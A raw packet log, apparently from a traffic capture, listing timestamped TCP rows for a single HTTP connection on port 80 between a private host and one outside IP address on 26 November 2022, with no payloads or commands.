Nov 26, 2022 11:17:40.068392992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.068413973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.068424940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.068437099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.068475962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069046021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069067955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069087982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069106102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069119930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069144964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069154978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069175005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069196939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069211960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069225073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069248915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069262981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069278002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069300890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069314003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069329977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069353104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069365978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069382906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069405079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069418907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069432974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069456100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069468975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069485903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069506884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069523096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069535017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069574118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069585085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069611073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069632053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069648981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069658041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069684029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069694042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069714069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069736958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069751024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069766998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069791079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069804907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069822073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069844961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069859028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069875002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069897890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069911003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069927931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069950104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.069963932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.069979906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070002079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070018053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.070031881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070069075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.070581913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070605040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070626020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070645094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.070653915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070688009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.070707083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070729017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070750952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070764065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.070780993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070804119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070813894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.070832968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070854902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070864916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.070895910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070918083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070930004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.070945978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070970058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.070981026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.071000099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071022034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071033001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.071052074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071091890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.071630955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071651936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071672916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071693897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.071696997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071723938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071733952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.071754932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071777105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071790934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.071804047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071827888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071840048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.071868896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071887970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071906090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.071908951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071930885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071943998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.071954012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.071990967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.072303057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072321892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072340012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072355032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.072364092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072386026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072398901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.072427034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072448015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072459936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.072474957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072496891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072508097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.072525024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072546005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072560072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.072571039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072593927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072604895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.072621107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072642088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072662115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.072664022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072688103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072698116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.072715044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.072762012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.073225975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073254108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073292017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.073299885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073321104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073343039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073354006 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.073369026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073388100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073400974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.073410988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073432922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073446035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.073457956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073479891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073492050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.073506117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073525906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073539019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.073549032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073569059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073582888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.073596954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073616028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073631048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.073638916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.073678017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.074183941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074206114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074242115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074253082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.074268103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074290037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074306011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.074316025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074338913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074352980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.074362040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074385881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074397087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.074414015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074434042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074454069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.074457884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074481964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074495077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.074516058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074536085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074553013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.074559927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074583054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074598074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.074613094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074634075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.074651003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.075114012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075134993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075151920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075166941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.075179100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075192928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.075207949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075231075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075243950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.075258970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075284958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075290918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.075314999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075335026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075356007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075362921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.075382948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075392962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.075412035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075463057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.075485945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075505972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075524092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075542927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075562954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075583935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.075589895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.075628996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.076057911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076087952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076106071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076127052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.076128006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076150894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076172113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076173067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.076196909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076209068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.076220989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076241970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076260090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076282024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076298952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076316118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.076323032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076345921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076349020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.076371908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076390028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.076394081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076415062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076435089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076436043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.076459885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.076474905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.076997995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077017069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077033997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077050924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077073097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.077073097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077085018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.077099085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077116966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.077121973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077143908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077163935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077163935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.077187061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077200890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.077214003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077234030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077250004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.077595949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077614069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077632904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077644110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.077660084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077673912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.077687979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077707052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077725887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.077728033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077752113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077769041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.077775002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077795029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077812910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.077816963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077838898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077853918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.077856064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.077893972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.078109026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078126907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078144073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078162909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078182936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078183889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.078207970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078210115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.078233004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078248978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.078258991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078279972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078300953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078300953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.078325033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078341961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.078347921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078370094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078387022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.078393936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078417063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078433990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.078438997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078460932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078474998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.078486919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078505993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078524113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.078527927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.078563929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.079044104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079062939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079082012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079102039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079113007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.079129934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079144955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.079157114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079180002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079199076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079205990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.079225063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079240084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.079252005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079273939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079292059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.079298019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079320908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079339981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.079344034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079366922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079384089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.079391003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079412937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.079431057 CET	49707	80	192.168.2.5	66.235.200.147
